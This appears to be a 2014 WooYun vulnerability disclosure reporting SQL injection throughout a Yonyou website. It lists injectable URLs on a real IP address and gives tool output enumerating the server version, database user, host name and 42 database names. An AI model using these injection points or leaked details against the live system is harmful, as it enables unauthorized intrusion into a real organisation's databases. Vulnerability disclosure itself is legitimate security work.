用友某站全页面sql注入(涉及42个数据,多个业务吧)

漏洞详情

披露状态:

2014-05-11: 细节已通知厂商并且等待厂商处理中
2014-05-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

测试贵公司其他产品随手捡的,没多测了,不喜欢玩mssql

详细说明:

问题站点:

0.jpg



sql注入:

http://223.203.195.159/Px_plan1.aspx?infoid=32

http://223.203.195.159/News_1.aspx?newsid=33

http://223.203.195.159/Course_Info_M.aspx?typeid=68

....

还有很多,大部分的参数都是注入点,整型、字符型通吃,可以考虑整站暂时下线修补

2.jpg



3.jpg



1.jpg

漏洞证明:

Target: 	http://223.203.195.159/News_1.aspx?newsid=33
Host IP: 223.203.195.159
Web Server: Microsoft-IIS/7.5
Powered-by: ASP.NET
DB Server: MsSQL no error
Resp. Time(avg): 147 ms
Current User: timber
Sql Version: Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) <br> Oct 19 2012 13:38:57 <br> Copyright (c) Microsoft Corporation<br> Enterprise Edition (64-bit) on Windows NT 6.1 &lt;X64&gt; (Build 7601: Service Pack 1)<br>
Current DB: Timber1
System User: timber
Host Name: WIN-DJ569DKLKJE
Server Name: YSDBCLUSTER
master
tempdb
model
msdb
YSupport
YYPortal
CDMI
YYBBS
UFSpsKC
ySupport_Log
Token
YOP
Yonyou
UserCenter
YIP
P1998
P1999
P2000
P2001
P2002
P2003
P2004
P2005
P2006
P2007
P2008
P2009
P2010
P2011
P2012
P2013
P2014
PCommon
ufsims_zhongduan_old
PCAS_NEW
ufsims_zhongduan
Timber1
Timber2
P2015
BQ_YS
HandheldYonYou

修复方案:

你们业务线广、产品多、竞争力强,好公司

版权声明:转载请注明来源 浩天@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-05-11 22:38

厂商回复:

最新状态:

暂无


漏洞评价: